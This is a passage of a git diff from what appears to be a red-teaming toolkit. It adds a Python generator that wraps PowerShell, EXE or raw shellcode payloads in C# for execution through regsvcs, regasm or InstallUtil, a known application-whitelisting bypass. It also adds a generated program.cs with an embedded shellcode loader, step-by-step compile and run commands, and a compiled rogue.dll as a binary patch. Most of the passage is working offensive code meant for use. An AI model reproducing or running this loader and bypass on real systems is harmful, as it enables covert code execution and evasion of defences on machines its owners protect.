be: +# +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +# +# Step 3: Code execution via Regsvcs, Regasm or InstallUtil: +# x86: +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll + +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll + +# cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# x64: +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll + +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll + +# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# +# Mariusz B. / mgeeky, +# + +import re +import os +import io +import sys +import gzip +import base64 +import string +import struct +import random +import binascii +import argparse + + +def getCompressedPayload(filePath): + out = io.BytesIO() + encoded = '' + with open(filePath, 'rb') as f: + inp = f.read() + + with gzip.GzipFile(fileobj = out, mode = 'w') as fo: + fo.write(inp) + + encoded = base64.b64encode(out.getvalue()) + + powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format( + encoded.decode() + ) + return powershell + +def getSourceFileContents(payload, _format): + launchCode = '' + usings = '' + + if _format == 'exe': + + exeLaunchCode = string.Template(''' + public static void Execute() { + + string payload = "$payload2"; + byte[] decoded = System.Convert.FromBase64String(payload); + + Assembly asm = Assembly.Load(decoded); + MethodInfo method = asm.EntryPoint; + object instance = asm.CreateInstance(method.Name); + method.Invoke(instance, null); + + }''').safe_substitute( + payload2 = base64.b64encode(payload.encode()).decode() + ) + + + launchCode = exeLaunchCode + + elif _format == 'raw': + + foo = str(binascii.hexlify(payload), 'ascii') + fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)] + encodedPayload = ' ' + + for i in range(len(fooarr)): + if i % 16 == 0 and i > 0: + encodedPayload += '\n ' + encodedPayload += '{}, '.format(fooarr[i]) + + encodedPayload = encodedPayload.strip()[:-1] + + shellcodeLoader = string.Template(''' + [DllImport("kernel32")] + private static extern IntPtr VirtualAlloc( + IntPtr lpAddress, UIntPtr dwSize, + UInt32 flAllocationType, + UInt32 flProtect + ); + + [DllImport("kernel32")] + private static extern bool VirtualFree( + IntPtr lpAddress, + UInt32 dwSize, + UInt32 dwFreeType + ); + + [DllImport("kernel32")] + private static extern IntPtr CreateThread( + UInt32 lpThreadAttributes, + UInt32 dwStackSize, + IntPtr lpStartAddress, + IntPtr param, + UInt32 dwCreationFlags, + ref UInt32 lpThreadId + ); + + [DllImport("kernel32")] + private static extern bool CloseHandle( + IntPtr hHandle + ); + + [DllImport("kernel32")] + private static extern UInt32 WaitForSingleObject( + IntPtr hHandle, + UInt32 dwMilliseconds + ); + + private static UInt32 MEM_COMMIT = 0x1000; + private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; + private static UInt32 MEM_RELEASE = 0x8000; + + public static void Execute() { + + byte[] payload = new byte[$payloadSize] { + $payload2 + }; + + IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + Marshal.Copy(payload, 0, funcAddr, payload.Length); + IntPtr hThread = IntPtr.Zero; + UInt32 threadId = 0; + + hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId); + WaitForSingleObject(hThread, 0xFFFFFFFF); + + CloseHandle(hThread); + VirtualFree(funcAddr, 0, MEM_RELEASE); + + }''').safe_substitute( + payload2 = encodedPayload, + payloadSize = len(payload) + ) + + launchCode = shellcodeLoader + + else: + usings += ''' +using System.Management.Automation; +using System.Management.Automation.Runspaces; +''' + powershellLaunchCode = string.Template(''' + public static void Execute() { + + byte[] payload = System.Convert.FromBase64String("$payload2"); + string decoded = System.Text.Encoding.UTF8.GetString(payload); + + Runspace runspace = RunspaceFactory.CreateRunspace(); + runspace.Open(); + + Pipeline pipeline = runspace.CreatePipeline(); + pipeline.Commands.AddScript(decoded); + pipeline.Invoke(); + + runspace.Close(); + }''').safe_substitute( + payload2 = base64.b64encode(payload.encode()).decode() + ) + + launchCode = powershellLaunchCode + + + template = string.Template(''' +using System; +using System.Diagnostics; +using System.Reflection; +using System.Runtime.InteropServices; +using System.EnterpriseServices; +$usings + +/* + Author: Casey Smith, Twitter: @subTee + Customized by: Mariusz B. / mgeeky, + License: BSD 3-Clause + + Step 1: Create Your Strong Name Key -> key.snk + + $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' + $Content = [System.Convert]::FromBase64String($key) + Set-Content key.snk -Value $Content -Encoding Byte + + Step 2: Compile source code: + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs + + Step 3: Execute your payload! + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll +*/ + +namespace Program +{ + public class Bypass : ServicedComponent + { + public Bypass() + { + } + + // This executes if registration is successful + [ComRegisterFunction] + public static void RegisterClass( string key ) + { + Shellcode.Execute(); + } + + // This executes if registration fails + [ComUnregisterFunction] + public static void UnRegisterClass( string key ) + { + Shellcode.Execute(); + } + } + + [System.ComponentModel.RunInstaller(true)] + public class ForInstallUtil : System.Configuration.Install.Installer + { + // This executes during InstallUtil /U invocation + public override void Uninstall(System.Collections.IDictionary savedState) + { + Shellcode.Execute(); + } + } + + public class Shellcode + { + $launchCode + } +}''').safe_substitute( + launchCode = launchCode, + usings = usings + ) + + return template + +def detectFileIsExe(filePath, forced = False): + first1000 = [] + + with open(filePath, 'rb') as f: + first1000 = f.read()[:1000] + + if not (first1000[0] == 'M' and first1000[1] == 'Z'): + return False + + elfanew = struct.unpack(' + +''') + if len(argv) < 2: + print('Usage: ./generateRogueDotNet.py ') + sys.exit(-1) + + args = opts(argv) + + _format = 'powershell' + + if args.exe: + if not detectFileIsExe(args.inputFile, args.exe): + sys.stderr.write('[-] File not recognized as PE/EXE.\n\n') + return False + + _format = 'exe' + sys.stderr.write('[+] File recognized as PE/EXE.\n\n') + with open(args.inputFile, 'rb') as f: + payload = f.read() + + elif args.raw: + _format = 'raw' + sys.stderr.write('[+] File specified as raw Shellcode.\n\n') + with open(args.inputFile, 'rb') as f: + payload = f.read() + + else: + sys.stderr.write('[+] Powershell code given.\n') + + if args.inputFile.endswith('.exe'): + return False + + payload = getCompressedPayload(args.inputFile) + + output = getSourceFileContents(payload, _format) + + print(output) + + management = '' + if _format == 'powershell': + management = ' /r:System.Management.Automation.dll' + + commands = ''' + +===================================== + +Step 1: Create Your Strong Name Key -> key.snk + + $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' + $Content = [System.Convert]::FromBase64String($key) + Set-Content key.snk -Value $Content -Encoding Byte + +Step 2: Compile source code: + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs + +Step 3: Execute your payload! + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll + + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll + + %WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll + %WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll + '''.format(management) + + if 'PROGRAMFILES(X86)' in os.environ: + commands = commands.replace('Framework', 'Framework64') + + sys.stderr.write(commands) + +if __name__ == '__main__': + main(sys.argv) diff --git a/red-teaming/regsvcs/key.snk b/red-teaming/rogue-dot-net/key.snk similarity index 100% rename from red-teaming/regsvcs/key.snk rename to red-teaming/rogue-dot-net/key.snk diff --git a/red-teaming/rogue-dot-net/notepad64.bin b/red-teaming/rogue-dot-net/notepad64.bin new file mode 100644 index 0000000000000000000000000000000000000000..45231ea37e9068d9a9912c6ce4c3301efa8f7d0f GIT binary patch literal 279 zcmez4(fs7YivtV{432@00YQOb9)_1vJ-UMufLH>E6+F6&0zCM)dwKa9p7bz0u*N2_ zhDk@k@!&~bN5+GX-Uc}af>d=o*?2Hs=x*o$8syP>pd=m03+VQcaOrkX@MOI3ILzb! zNyl!J4iCm_P;;OrSUf2G=)>%z!r^LpvGhg+P`wIJeVSu8j|Y$~17tgPvjDYSaEx$_ zh>MH@Qjv~P9?fqQ9E1Kp0CJ){x`keb|Ns9#)?*hV&~^~;=lF3Qhhh;;0{_5W&Keo1OUVv1gBMJfXT Dv0!h| literal 0 HcmV?d00001 diff --git a/red-teaming/regsvcs/program-template.cs b/red-teaming/rogue-dot-net/program-template.cs similarity index 100% rename from red-teaming/regsvcs/program-template.cs rename to red-teaming/rogue-dot-net/program-template.cs diff --git a/red-teaming/rogue-dot-net/program.cs b/red-teaming/rogue-dot-net/program.cs new file mode 100644 index 0000000..2dbdce1 --- /dev/null +++ b/red-teaming/rogue-dot-net/program.cs @@ -0,0 +1,141 @@ + +using System; +using System.Diagnostics; +using System.Reflection; +using System.Runtime.InteropServices; +using System.EnterpriseServices; + + +/* + Author: Casey Smith, Twitter: @subTee + Customized by: Mariusz B. / mgeeky, + License: BSD 3-Clause + + Step 1: Create Your Strong Name Key -> key.snk + + $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' + $Content = [System.Convert]::FromBase64String($key) + Set-Content key.snk -Value $Content -Encoding Byte + + Step 2: Compile source code: + C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs + + Step 3: Execute your payload! + C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll + C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll + C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll + C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll +*/ + +namespace Program +{ + public class Bypass : ServicedComponent + { + public Bypass() + { + } + + // This executes if registration is successful + [ComRegisterFunction] + public static void RegisterClass( string key ) + { + Shellcode.Execute(); + } + + // This executes if registration fails + [ComUnregisterFunction] + public static void UnRegisterClass( string key ) + { + Shellcode.Execute(); + } + } + + [System.ComponentModel.RunInstaller(true)] + public class ForInstallUtil : System.Configuration.Install.Installer + { + // This executes during InstallUtil /U invocation + public override void Uninstall(System.Collections.IDictionary savedState) + { + Shellcode.Execute(); + } + } + + public class Shellcode + { + + [DllImport("kernel32")] + private static extern IntPtr VirtualAlloc( + IntPtr lpAddress, UIntPtr dwSize, + UInt32 flAllocationType, + UInt32 flProtect + ); + + [DllImport("kernel32")] + private static extern bool VirtualFree( + IntPtr lpAddress, + UInt32 dwSize, + UInt32 dwFreeType + ); + + [DllImport("kernel32")] + private static extern IntPtr CreateThread( + UInt32 lpThreadAttributes, + UInt32 dwStackSize, + IntPtr lpStartAddress, + IntPtr param, + UInt32 dwCreationFlags, + ref UInt32 lpThreadId + ); + + [DllImport("kernel32")] + private static extern bool CloseHandle( + IntPtr hHandle + ); + + [DllImport("kernel32")] + private static extern UInt32 WaitForSingleObject( + IntPtr hHandle, + UInt32 dwMilliseconds + ); + + private static UInt32 MEM_COMMIT = 0x1000; + private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; + private static UInt32 MEM_RELEASE = 0x8000; + + public static void Execute() { + + byte[] payload = new byte[279] { + 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, + 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, + 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, + 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, + 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, + 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, + 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, + 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, + 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, + 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, + 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, + 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, + 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, + 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, + 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, + 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x6e, 0x6f, 0x74, 0x65, 0x70, + 0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00 + }; + + IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + Marshal.Copy(payload, 0, funcAddr, payload.Length); + IntPtr hThread = IntPtr.Zero; + UInt32 threadId = 0; + + hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId); + WaitForSingleObject(hThread, 0xFFFFFFFF); + + CloseHandle(hThread); + VirtualFree(funcAddr, 0, MEM_RELEASE); + + } + } +} diff --git a/red-teaming/rogue-dot-net/rogue.dll b/red-teaming/rogue-dot-net/rogue.dll new file mode 100644 index 0000000000000000000000000000000000000000..f893649401bb06849c5a47e49f49604379c6c021 GIT binary patch literal 5632 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 Z`W1ZH8SrF&H}9 literal 0 HcmV?d00001